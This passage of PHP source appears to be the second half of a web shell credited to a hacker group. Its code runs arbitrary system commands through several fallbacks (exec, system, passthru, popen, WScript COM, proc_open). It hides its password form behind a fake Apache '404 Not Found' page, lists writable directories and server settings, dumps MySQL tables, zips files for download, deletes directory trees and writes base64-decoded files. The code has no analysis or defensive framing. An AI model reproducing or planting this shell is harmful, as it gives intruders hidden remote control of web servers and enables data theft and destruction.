1700 $shell = new COM('Shell.Application');
1701 $a = $shell->ShellExecute($program, $parameter);
1702 m('Program run has ' . (!$a ? 'success' : 'fail'));
1703 }
1704 !$program && $program = 'c:\windows\system32\cmd.exe';
1705 !$parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt';
1706 formhead(array('title' => 'Execute Program'));
1707 makehide('action', 'shell');
1708 makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1));
1709 p('<p>');
1710 makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter));
1711 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1712 p('</p>');
1713 formfoot();
1714 }
1715 formhead(array('title' => 'Execute Command'));
1716 makehide('action', 'shell');
1717 if (IS_WIN && IS_COM) {
1718 $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open');
1719 makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1));
1720 }
1721 p('<p>');
1722 makeinput(array('title' => 'Command', 'name' => 'command', 'value' => $command));
1723 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1724 p('</p>');
1725 formfoot();
1726 if ($command) {
1727 p('<hr width="100%" noshade /><pre>');
1728 if ($execfunc == 'wscript' && IS_WIN && IS_COM) {
1729 $wsh = new COM('WScript.shell');
1730 $exec = $wsh->exec('cmd.exe /c ' . $command);
1731 $stdout = $exec->StdOut();
1732 $stroutput = $stdout->ReadAll();
1733 echo $stroutput;
1734 } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) {
1735 $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
1736 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1737 if (is_resource($process)) {
1738 fwrite($pipes[0], $command . "\r\n");
1739 fwrite($pipes[0], "exit\r\n");
1740 fclose($pipes[0]);
1741 while (!feof($pipes[1])) {
1742 echo fgets($pipes[1], 1024);
1743 }
1744 fclose($pipes[1]);
1745 while (!feof($pipes[2])) {
1746 echo fgets($pipes[2], 1024);
1747 }
1748 fclose($pipes[2]);
1749 proc_close($process);
1750 }
1751 } else {
1752 echo (execute($command));
1753 }
1754 p('</pre>');
1755 }
1756} elseif ($action == 'phpenv') {
1757 $upsize = getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1758 $adminmail = isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1759 !$dis_func && $dis_func = 'No';
1760 $info = array(1 => array('Server Time', date('Y/m/d h:i:s', $timestamp)), 2 => array('Server Domain', $_SERVER['SERVER_NAME']), 3 => array('Server IP', gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS', PHP_OS), 5 => array('Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software', $_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port', $_SERVER['SERVER_PORT']), 8 => array('PHP run mode', strtoupper(php_sapi_name())), 9 => array('The file path', __FILE__), 10 => array('PHP Version', PHP_VERSION), 11 => array('PHPINFO', (IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')), 12 => array('Safe Mode', getcfg('safe_mode')), 13 => array('Administrator', $adminmail), 14 => array('allow_url_fopen', getcfg('allow_url_fopen')), 15 => array('enable_dl', getcfg('enable_dl')), 16 => array('display_errors', getcfg('display_errors')), 17 => array('register_globals', getcfg('register_globals')), 18 => array('magic_quotes_gpc', getcfg('magic_quotes_gpc')), 19 => array('memory_limit', getcfg('memory_limit')), 20 => array('post_max_size', getcfg('post_max_size')), 21 => array('upload_max_filesize', $upsize), 22 => array('max_execution_time', getcfg('max_execution_time') . ' second(s)'), 23 => array('disable_functions', $dis_func),);
1761 if ($phpvarname) {
1762 m($phpvarname . ' : ' . getcfg($phpvarname));
1763 }
1764 formhead(array('title' => 'Server environment'));
1765 makehide('action', 'phpenv');
1766 makeinput(array('title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)', 'name' => 'phpvarname', 'value' => $phpvarname, 'newline' => 1));
1767 formfooter();
1768 $hp = array(0 => 'Server', 1 => 'PHP');
1769 for ($a = 0;$a < 2;$a++) {
1770 p('<h2>' . $hp[$a] . ' »</h2>');
1771 p('<ul class="info">');
1772 if ($a == 0) {
1773 for ($i = 1;$i <= 9;$i++) {
1774 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1775 }
1776 } elseif ($a == 1) {
1777 for ($i = 10;$i <= 23;$i++) {
1778 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1779 }
1780 }
1781 p('</ul>');
1782 }
1783} else {
1784 m('Undefined Action');
1785}
1786?>
1787
1788</td></tr></table>
1789
1790<div style="padding:10px;">
1791
1792 <span style="float:right;"><?php debuginfo();
1793ob_end_flush(); ?></span>
1794
1795 Copyright (C) 2013 - Develop by <a herf="http://google.com">DEMON Hacker</a> - ANONYMOUS - Team - Vietnamese Hackers World
1796
1797</div>
1798
1799</body>
1800
1801</html>
1802
1803
1804
1805<?php
1806/*======================================================
1807
1808Show info shell
1809
1810======================================================*/
1811function m($msg) {
1812 echo '<div style="background:#00b000;border:1px solid #006700;padding:15px;font:14px;color:#ffffff;text-align:center;font-weight:bold;">';
1813 echo $msg;
1814 echo '</div>';
1815}
1816function scookie($key, $value, $life = 0, $prefix = 1) {
1817 global $admin, $timestamp, $_SERVER;
1818 $key = ($prefix ? $admin['cookiepre'] : '') . $key;
1819 $life = $life ? $life : $admin['cookielife'];
1820 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1821 setcookie($key, $value, $timestamp + $life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
1822}
1823function multi($num, $perpage, $curpage, $tablename) {
1824 $multipage = '';
1825 if ($num > $perpage) {
1826 $page = 10;
1827 $offset = 5;
1828 $pages = @ceil($num / $perpage);
1829 if ($page > $pages) {
1830 $from = 1;
1831 $to = $pages;
1832 } else {
1833 $from = $curpage - $offset;
1834 $to = $curpage + $page - $offset - 1;
1835 if ($from < 1) {
1836 $to = $curpage + 1 - $from;
1837 $from = 1;
1838 if (($to - $from) < $page && ($to - $from) < $pages) {
1839 $to = $page;
1840 }
1841 } elseif ($to > $pages) {
1842 $from = $curpage - $pages + $to;
1843 $to = $pages;
1844 if (($to - $from) < $page && ($to - $from) < $pages) {
1845 $from = $pages - $page + 1;
1846 }
1847 }
1848 }
1849 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', 1);">First</a> ' : '') . ($curpage > 1 ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage - 1) . ');">Prev</a> ' : '');
1850 for ($i = $from;$i <= $to;$i++) {
1851 $multipage.= $i == $curpage ? $i . ' ' : '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $i . ');">[' . $i . ']</a> ';
1852 }
1853 $multipage.= ($curpage < $pages ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage + 1) . ');">Next</a>' : '') . ($to < $pages ? ' <a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $pages . ');">Last</a>' : '');
1854 $multipage = $multipage ? '<p>Pages: ' . $multipage . '</p>' : '';
1855 }
1856 return $multipage;
1857}
1858function loginpage() {
1859?>
1860
1861<html> <title>404 Not Found</title> <h1>Not Found</h1> <p>The requested URL / was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache Server at Port 80</address> <style> input { margin:0;background-color:#fff;border:1px solid #fff; } </style> <center> <form method="POST" action=""> <span style="font:10pt tahoma;"></span><input name="password" type="password" size="20"> <input type="hidden" name="doing" value="login"> </form> </center> </html>
1862
1863
1864
1865
1866<?php
1867 exit;
1868}
1869function execute($cfe) {
1870 $res = '';
1871 if ($cfe) {
1872 if (function_exists('exec')) {
1873 @exec($cfe, $res);
1874 $res = join("\n", $res);
1875 } elseif (function_exists('shell_exec')) {
1876 $res = @shell_exec($cfe);
1877 } elseif (function_exists('system')) {
1878 @ob_start();
1879 @system($cfe);
1880 $res = @ob_get_contents();
1881 @ob_end_clean();
1882 } elseif (function_exists('passthru')) {
1883 @ob_start();
1884 @passthru($cfe);
1885 $res = @ob_get_contents();
1886 @ob_end_clean();
1887 } elseif (@is_resource($f = @popen($cfe, "r"))) {
1888 $res = '';
1889 while (!@feof($f)) {
1890 $res.= @fread($f, 1024);
1891 }
1892 @pclose($f);
1893 }
1894 }
1895 return $res;
1896}
1897function which($pr) {
1898 $path = execute("which $pr");
1899 return ($path ? $path : $pr);
1900}
1901function cf($fname, $text) {
1902 if ($fp = @fopen($fname, 'w')) {
1903 @fputs($fp, base64_decode($text));
1904 @fclose($fp);
1905 }
1906}
1907function debuginfo() {
1908 global $starttime;
1909 $mtime = explode(' ', microtime());
1910 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1911 echo 'Processed in ' . $totaltime . ' second(s)';
1912}
1913function dbconn($dbhost, $dbuser, $dbpass, $dbname = '', $charset = '', $dbport = '3306') {
1914 if (!$link = @mysql_connect($dbhost . ':' . $dbport, $dbuser, $dbpass)) {
1915 p('<h2>Can not connect to MySQL server</h2>');
1916 exit;
1917 }
1918 if ($link && $dbname) {
1919 if (!@mysql_select_db($dbname, $link)) {
1920 p('<h2>Database selected has error</h2>');
1921 exit;
1922 }
1923 }
1924 if ($link && mysql_get_server_info() > '4.1') {
1925 if (in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
1926 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1927 }
1928 }
1929 return $link;
1930}
1931function s_array(&$array) {
1932 if (is_array($array)) {
1933 foreach ($array as $k => $v) {
1934 $array[$k] = s_array($v);
1935 }
1936 } else if (is_string($array)) {
1937 $array = stripslashes($array);
1938 }
1939 return $array;
1940}
1941function html_clean($content) {
1942 $content = htmlspecialchars($content);
1943 $content = str_replace("\n", "<br />", $content);
1944 $content = str_replace(" ", " ", $content);
1945 $content = str_replace("\t", " ", $content);
1946 return $content;
1947}
1948function getChmod($filepath) {
1949 return substr(base_convert(@fileperms($filepath), 10, 8), -4);
1950}
1951function getPerms($filepath) {
1952 $mode = @fileperms($filepath);
1953 if (($mode & 0xC000) === 0xC000) {
1954 $type = 's';
1955 } elseif (($mode & 0x4000) === 0x4000) {
1956 $type = 'd';
1957 } elseif (($mode & 0xA000) === 0xA000) {
1958 $type = 'l';
1959 } elseif (($mode & 0x8000) === 0x8000) {
1960 $type = '-';
1961 } elseif (($mode & 0x6000) === 0x6000) {
1962 $type = 'b';
1963 } elseif (($mode & 0x2000) === 0x2000) {
1964 $type = 'c';
1965 } elseif (($mode & 0x1000) === 0x1000) {
1966 $type = 'p';
1967 } else {
1968 $type = '?';
1969 }
1970 $owner['read'] = ($mode & 00400) ? 'r' : '-';
1971 $owner['write'] = ($mode & 00200) ? 'w' : '-';
1972 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1973 $group['read'] = ($mode & 00040) ? 'r' : '-';
1974 $group['write'] = ($mode & 00020) ? 'w' : '-';
1975 $group['execute'] = ($mode & 00010) ? 'x' : '-';
1976 $world['read'] = ($mode & 00004) ? 'r' : '-';
1977 $world['write'] = ($mode & 00002) ? 'w' : '-';
1978 $world['execute'] = ($mode & 00001) ? 'x' : '-';
1979 if ($mode & 0x800) {
1980 $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
1981 }
1982 if ($mode & 0x400) {
1983 $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
1984 }
1985 if ($mode & 0x200) {
1986 $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';
1987 }
1988 return $type . $owner['read'] . $owner['write'] . $owner['execute'] . $group['read'] . $group['write'] . $group['execute'] . $world['read'] . $world['write'] . $world['execute'];
1989}
1990function getUser($filepath) {
1991 if (function_exists('posix_getpwuid')) {
1992 $array = @posix_getpwuid(@fileowner($filepath));
1993 if ($array && is_array($array)) {
1994 return ' / <a href="#" title="User: ' . $array['name'] . '
Passwd: ' . $array['passwd'] . '
Uid: ' . $array['uid'] . '
gid: ' . $array['gid'] . '
Gecos: ' . $array['gecos'] . '
Dir: ' . $array['dir'] . '
Shell: ' . $array['shell'] . '">' . $array['name'] . '</a>';
1995 }
1996 }
1997 return '';
1998}
1999function deltree($deldir) {
2000 $mydir = @dir($deldir);
2001 while ($file = $mydir->read()) {
2002 if ((is_dir($deldir . '/' . $file)) && ($file != '.') && ($file != '..')) {
2003 @chmod($deldir . '/' . $file, 0777);
2004 deltree($deldir . '/' . $file);
2005 }
2006 if (is_file($deldir . '/' . $file)) {
2007 @chmod($deldir . '/' . $file, 0777);
2008 @unlink($deldir . '/' . $file);
2009 }
2010 }
2011 $mydir->close();
2012 @chmod($deldir, 0777);
2013 return @rmdir($deldir) ? 1 : 0;
2014}
2015function bg() {
2016 global $bgc;
2017 return ($bgc++ % 2 == 0) ? 'alt1' : 'alt2';
2018}
2019function getPath($scriptpath, $nowpath) {
2020 if ($nowpath == '.') {
2021 $nowpath = $scriptpath;
2022 }
2023 $nowpath = str_replace('\\', '/', $nowpath);
2024 $nowpath = str_replace('//', '/', $nowpath);
2025 if (substr($nowpath, -1) != '/') {
2026 $nowpath = $nowpath . '/';
2027 }
2028 return $nowpath;
2029}
2030function getUpPath($nowpath) {
2031 $pathdb = explode('/', $nowpath);
2032 $num = count($pathdb);
2033 if ($num > 2) {
2034 unset($pathdb[$num - 1], $pathdb[$num - 2]);
2035 }
2036 $uppath = implode('/', $pathdb) . '/';
2037 $uppath = str_replace('//', '/', $uppath);
2038 return $uppath;
2039}
2040function getcfg($varname) {
2041 $result = get_cfg_var($varname);
2042 if ($result == 0) {
2043 return 'No';
2044 } elseif ($result == 1) {
2045 return 'Yes';
2046 } else {
2047 return $result;
2048 }
2049}
2050function getfun($funName) {
2051 return (false !== function_exists($funName)) ? 'Yes' : 'No';
2052}
2053function GetList($dir) {
2054 global $dirdata, $j, $nowpath;
2055 !$j && $j = 1;
2056 if ($dh = opendir($dir)) {
2057 while ($file = readdir($dh)) {
2058 $f = str_replace('//', '/', $dir . '/' . $file);
2059 if ($file != '.' && $file != '..' && is_dir($f)) {
2060 if (is_writable($f)) {
2061 $dirdata[$j]['filename'] = str_replace($nowpath, '', $f);
2062 $dirdata[$j]['mtime'] = @date('Y-m-d H:i:s', filemtime($f));
2063 $dirdata[$j]['dirchmod'] = getChmod($f);
2064 $dirdata[$j]['dirperm'] = getPerms($f);
2065 $dirdata[$j]['dirlink'] = ue($dir);
2066 $dirdata[$j]['server_link'] = $f;
2067 $dirdata[$j]['client_link'] = ue($f);
2068 $j++;
2069 }
2070 GetList($f);
2071 }
2072 }
2073 closedir($dh);
2074 clearstatcache();
2075 return $dirdata;
2076 } else {
2077 return array();
2078 }
2079}
2080function qy($sql) {
2081 $res = $error = '';
2082 if (!$res = @mysql_query($sql)) {
2083 return 0;
2084 } else if (is_resource($res)) {
2085 return 1;
2086 } else {
2087 return 2;
2088 }
2089 return 0;
2090}
2091function q($sql) {
2092 return @mysql_query($sql);
2093}
2094function fr($qy) {
2095 mysql_free_result($qy);
2096}
2097function sizecount($size) {
2098 if ($size > 1073741824) {
2099 $size = round($size / 1073741824 * 100) / 100 . ' G';
2100 } elseif ($size > 1048576) {
2101 $size = round($size / 1048576 * 100) / 100 . ' M';
2102 } elseif ($size > 1024) {
2103 $size = round($size / 1024 * 100) / 100 . ' K';
2104 } else {
2105 $size = $size . ' B';
2106 }
2107 return $size;
2108}
2109class PHPZip {
2110 var $out = '';
2111 function PHPZip($dir) {
2112 if (@function_exists('gzcompress')) {
2113 $curdir = getcwd();
2114 if (is_array($dir)) $filelist = $dir;
2115 else {
2116 $filelist = $this->GetFileList($dir);
2117 foreach ($filelist as $k => $v) $filelist[] = substr($v, strlen($dir) + 1);
2118 }
2119 if ((!empty($dir)) && (!is_array($dir)) && (file_exists($dir))) chdir($dir);
2120 else chdir($curdir);
2121 if (count($filelist) > 0) {
2122 foreach ($filelist as $filename) {
2123 if (is_file($filename)) {
2124 $fd = fopen($filename, 'r');
2125 $content = @fread($fd, filesize($filename));
2126 fclose($fd);
2127 if (is_array($dir)) $filename = basename($filename);
2128 $this->addFile($content, $filename);
2129 }
2130 }
2131 $this->out = $this->file();
2132 chdir($curdir);
2133 }
2134 return 1;
2135 } else return 0;
2136 }
2137 function GetFileList($dir) {
2138 static $a;
2139 if (is_dir($dir)) {
2140 if ($dh = opendir($dir)) {
2141 while ($file = readdir($dh)) {
2142 if ($file != '.' && $file != '..') {
2143 $f = $dir . '/' . $file;
2144 if (is_dir($f)) $this->GetFileList($f);
2145 $a[] = $f;
2146 }
2147 }
2148 closedir($dh);
2149 }
2150 }
2151 return $a;
2152 }
2153 var $datasec = array();
2154 var $ctrl_dir = array();
2155 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
2156 var $old_offset = 0;
2157 function unix2DosTime($unixtime = 0) {
2158 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
2159 if ($timearray['year'] < 1980) {
2160 $timearray['year'] = 1980;
2161 $timearray['mon'] = 1;
2162 $timearray['mday'] = 1;
2163 $timearray['hours'] = 0;
2164 $timearray['minutes'] = 0;
2165 $timearray['seconds'] = 0;
2166 }
2167 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
2168 }
2169 function addFile($data, $name, $time = 0) {
2170 $name = str_replace('\\', '/', $name);
2171 $dtime = dechex($this->unix2DosTime($time));
2172 $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
2173 eval('$hexdtime = "' . $hexdtime . '";');
2174 $fr = "\x50\x4b\x03\x04";
2175 $fr.= "\x14\x00";
2176 $fr.= "\x00\x00";
2177 $fr.= "\x08\x00";
2178 $fr.= $hexdtime;
2179 $unc_len = strlen($data);
2180 $crc = crc32($data);
2181 $zdata = gzcompress($data);
2182 $c_len = strlen($zdata);
2183 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
2184 $fr.= pack('V', $crc);
2185 $fr.= pack('V', $c_len);
2186 $fr.= pack('V', $unc_len);
2187 $fr.= pack('v', strlen($name));
2188 $fr.= pack('v', 0);
2189 $fr.= $name;
2190 $fr.= $zdata;
2191 $fr.= pack('V', $crc);
2192 $fr.= pack('V', $c_len);
2193 $fr.= pack('V', $unc_len);
2194 $this->datasec[] = $fr;
2195 $new_offset = strlen(implode('', $this->datasec));
2196 $cdrec = "\x50\x4b\x01\x02";
2197 $cdrec.= "\x00\x00";
2198 $cdrec.= "\x14\x00";
2199 $cdrec.= "\x00\x00";
2200 $cdrec.= "\x08\x00";
2201 $cdrec.= $hexdtime;
2202 $cdrec.= pack('V', $crc);
2203 $cdrec.= pack('V', $c_len);
2204 $cdrec.= pack('V', $unc_len);
2205 $cdrec.= pack('v', strlen($name));
2206 $cdrec.= pack('v', 0);
2207 $cdrec.= pack('v', 0);
2208 $cdrec.= pack('v', 0);
2209 $cdrec.= pack('v', 0);
2210 $cdrec.= pack('V', 32);
2211 $cdrec.= pack('V', $this->old_offset);
2212 $this->old_offset = $new_offset;
2213 $cdrec.= $name;
2214 $this->ctrl_dir[] = $cdrec;
2215 }
2216 function file() {
2217 $data = implode('', $this->datasec);
2218 $ctrldir = implode('', $this->ctrl_dir);
2219 return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
2220 }
2221}
2222function sqldumptable($table, $fp = 0) {
2223 $tabledump = "DROP TABLE IF EXISTS $table;\n";
2224 $tabledump.= "CREATE TABLE $table (\n";
2225 $firstfield = 1;
2226 $fields = q("SHOW FIELDS FROM $table");
2227 while ($field = mysql_fetch_array($fields)) {
2228 if (!$firstfield) {
2229 $tabledump.= ",\n";
2230 } else {
2231 $firstfield = 0;
2232 }
2233 $tabledump.= " $field[Field] $field[Type]";
2234 if (!empty($field["Default"])) {
2235 $tabledump.= " DEFAULT '$field[Default]'";
2236 }
2237 if ($field['Null'] != "YES") {
2238 $tabledump.= " NOT NULL";
2239 }
2240 if ($field['Extra'] != "") {
2241 $tabledump.= " $field[Extra]";
2242 }
2243 }
2244 fr($fields);
2245 $keys = q("SHOW KEYS FROM $table");
2246 while ($key = mysql_fetch_array($keys)) {
2247 $kname = $key['Key_name'];
2248 if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
2249 $kname = "UNIQUE|$kname";
2250 }
2251 if (!is_array($index[$kname])) {
2252 $index[$kname] = array();
2253 }
2254 $index[$kname][] = $key['Column_name'];
2255 }
2256 fr($keys);
2257 while (list($kname, $columns) = @each($index)) {
2258 $tabledump.= ",\n";
2259 $colnames = implode($columns, ",");
2260 if ($kname == "PRIMARY") {
2261 $tabledump.= " PRIMARY KEY ($colnames)";
2262 } else {
2263 if (substr($kname, 0, 6) == "UNIQUE") {
2264 $kname = substr($kname, 7);
2265 }
2266 $tabledump.= " KEY $kname ($colnames)";
2267 }
2268 }
2269 $tabledump.= "\n);\n\n";
2270 if ($fp) {
2271 fwrite($fp, $tabledump);
2272 } else {
2273 echo $tabledump;
2274 }
2275 $rows = q("SELECT * FROM $table");
2276 $numfields = mysql_num_fields($rows);
2277 while ($row = mysql_fetch_array($rows)) {
2278 $tabledump = "INSERT INTO $table VALUES(";
2279 $fieldcounter = - 1;
2280 $firstfield = 1;
2281 while (++$fieldcounter < $numfields) {
2282 if (!$firstfield) {
2283 $tabledump.= ", ";
2284 } else {
2285 $firstfield = 0;
2286 }
2287 if (!isset($row[$fieldcounter])) {
2288 $tabledump.= "NULL";
2289 } else {
2290 $tabledump.= "'" . mysql_escape_string($row[$fieldcounter]) . "'";
2291 }
2292 }
2293 $tabledump.= ");\n";
2294 if ($fp) {
2295 fwrite($fp, $tabledump);
2296 } else {
2297 echo $tabledump;
2298 }
2299 }
2300 fr($rows);
2301 if ($fp) {
2302 fwrite($fp, "\n");
2303 } else {
2304 echo "\n";
2305 }
2306}
2307function ue($str) {
2308 return urlencode($str);
2309}
2310function p($str) {
2311 echo $str . "\n";
2312}
2313function tbhead() {
2314 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2315}
2316function tbfoot() {
2317 p('</table>');
2318}
2319function makehide($name, $value = '') {
2320 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2321}
2322function makeinput($arg = array()) {
2323 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2324 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2325 !$arg['type'] && $arg['type'] = 'text';
2326 $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2327 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2328 if ($arg['newline']) {
2329 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2330 } else {
2331 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2332 }
2333}
2334function makeselect($arg = array()) {
2335 if ($arg['onchange']) {
2336 $onchange = 'onchange="' . $arg['onchange'] . '"';
2337 }
2338 $arg['title'] = $arg['title'] ? $arg['title'] : '';
2339 if ($arg['newline']) p('<p>');
2340 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2341 if (is_array($arg['option'])) {
2342 foreach ($arg['option'] as $key => $value) {
2343 if ($arg['selected'] == $key) {
2344 p("<option value=\"$key\" selected>$value</option>");
2345 } else {
2346 p("<option value=\"$key\">$value</option>");
2347 }
2348 }
2349 }
2350 p("</select>");
2351 if ($arg['newline']) p('</p>');
2352}
2353function formhead($arg = array()) {
2354 !$arg['method'] && $arg['method'] = 'post';
2355 !$arg['action'] && $arg['action'] = $self;
2356 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2357 !$arg['name'] && $arg['name'] = 'form1';
2358 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2359 if ($arg['title']) {
2360 p('<h2>' . $arg['title'] . ' »</h2>');
2361 }
2362}
2363function maketext($arg = array()) {
2364 !$arg['cols'] && $arg['cols'] = 100;
2365 !$arg['rows'] && $arg['rows'] = 25;
2366 $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2367 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2368}
2369function formfooter($name = '') {
2370 !$name && $name = 'submit';
2371 p('<p><input class="bt" name="' . $name . '" id=\"' . $name . '\" type="submit" value="Submit"></p>');
2372 p('</form>');
2373}
2374function formfoot() {
2375 p('</form>');
2376}
2377function pr($a) {
2378 echo '<pre>';
2379 print_r($a);
2380 echo '</pre>';
2381}